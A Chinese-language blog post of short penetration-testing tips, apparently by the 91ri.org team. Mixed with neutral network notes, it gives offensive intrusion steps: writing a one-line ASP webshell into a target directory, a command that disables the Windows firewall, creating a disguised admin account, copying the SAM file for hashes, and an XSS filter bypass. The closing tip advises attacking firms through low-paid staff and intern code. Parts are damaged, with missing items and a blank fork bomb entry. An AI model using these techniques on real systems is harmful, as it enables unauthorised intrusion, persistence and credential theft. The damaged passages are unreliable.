【滲透筆記】(叁)

我們新開的欄目:【學習筆記】旨在與小伙伴們分享小編們的學習心得,滲透測試筆記連載由91ri網絡安全研究室的小編們帶來,主要為一些短小但又精華的滲透小技巧,這些技巧都是由小編們在平時讀書、學習的時候積累的一些小技巧,初定為每周更新一次。為保證質量,每一篇為20條左右的滲透小記。同時歡迎其他同學們投稿給我們你的筆記與大家分享~

 

1、提權簡單歸納一下,可以分為系統設置與第三方軟件缺陷提權、溢出提權、社會工程學提權。

 

2、asp webshell想要執行cmd命令,需要具備一起其中任一個組件:wscript.shell、wscript.shell1、shell applition、shell applition1

 

3、有時候添加賬號沒成功可能是服務器的強密碼策略(萬惡的2008),改個超強度的密碼再往死里整吧。

 

4、有時候能夠添加用戶,但是不能添加管理員組,這時候考慮是不是管理員組被改名了。可以利用net user administrator查看管理員所屬的組來確定名稱。

 

5、添加賬號一個小小技巧,妙用無限:在添加賬號時,將賬號名設為“ ”(引號里的字符為搜狗拼音打v+1時候的d項),不懂什么意思,net user一下你就知道這個淫蕩的技巧了。

 

缺陷參數:str

過濾規則夠BT 但是同樣能繞!

會把提交的編碼 給解碼 然后再插入到網頁中!然后再對網頁內的值進行檢查 過濾!

首先%26%23會被還原成 &# ?于是變成了: b 于是被還原成:b
b插入到頁面 再檢查 b+ase64 ?= base64 滿足規則 ?于是又過濾成 base64 ?繞過失敗!

但是如果b的html十進制編碼 再多加幾個000 ?便不會被他給解碼 ?但是在瀏覽器中又會被解碼 于是便可以這樣繞過!

——摘自《XSS神器]XssEncode chrome插件 – 0x_Jin》

8、淚滴攻擊是拒絕服務攻擊的一種。 淚滴是一個特殊構造的應用程序,通過發送偽造的相互重疊的IP分組數據包,使其難以被接收主機重新組合。他們通常會導致目標主機內核失措?。 淚滴攻擊利用IP分組數據包重疊造成TCP/ IP分片重組代碼不能恰當處理IP包。影響的系統有Windows 3.1、Windows 95和NT、2.0.32和2.1.63版本以下的Linux。

 

9、當防火墻被放置在外網邊界,一般不會開啟IDS功能,外網的攻擊比較多,也比較復雜,開啟IDS可能導致防火墻的性能出現問題。一般來說,當防火墻處于信息中心邊界時,可以開啟IDS;而在外網邊界可以使用專門的IDS或IPS設備。

 

10、Nessus是一個強大的掃描器,強大到它甚至擁有屬于自己的腳本語言,稱為Attack Scripting Language(NASL)。

 

?11、得到目標站目錄, 不能直接跨的 。 可以通過” echo ^<%execute(request(“cmd”))%^> >>X:目標目錄 X.asp “或者 “copy 腳本文件 X:目標目錄X.asp”像目標目錄寫入 webshell,或者還可以試試 type 命令。

 

12、在win下關閉防火墻 和 TCP/IP 篩選的命令:net stop policyagent & net stop sharedaccess

 

13、當 ?GetHashes ?獲取不到 ?hash ?時,可以用冰刃(IceSword)把 ?sam ?復制到桌面(適用于Windows 2000/XP/2003/Vista操作系統)。

14、一般來說,中文編碼使用big5時,在寫入某些數據庫系統中,在“許、蓋、功”這些字體上面會發生錯誤。

 

15、?

——Linux fork炸彈,其防范的方法是使用命令“ulimit -u 200”來限制每個用戶可以使用的最大進程數量。

 

16、標準ACL ,? 所謂標準,就是指依照標準IP協議進行過濾,而且只對數據包的源IP地址進行控制。所以,標準ACL的應用要盡量靠近目的IP。

 

17、擴展ACL應該靠近特征數據的源地址所在端口,這樣可以將被阻止的數據盡快地組織在不需傳遞它的網絡外面。

 

?18、滲透一定意義上是人與人的較量,所以呢,如果你現在月薪5000那么去黑掉一個大家伙的時候應該從月薪2000的地方入手,譬如前臺,運營,客服,hr,公關之類的為佳,找程序的入口也應該找實習生開發的,找外包的…… ? ? ?——by wooyun@xsser
本文為學習筆記,作者為91ri.org團隊。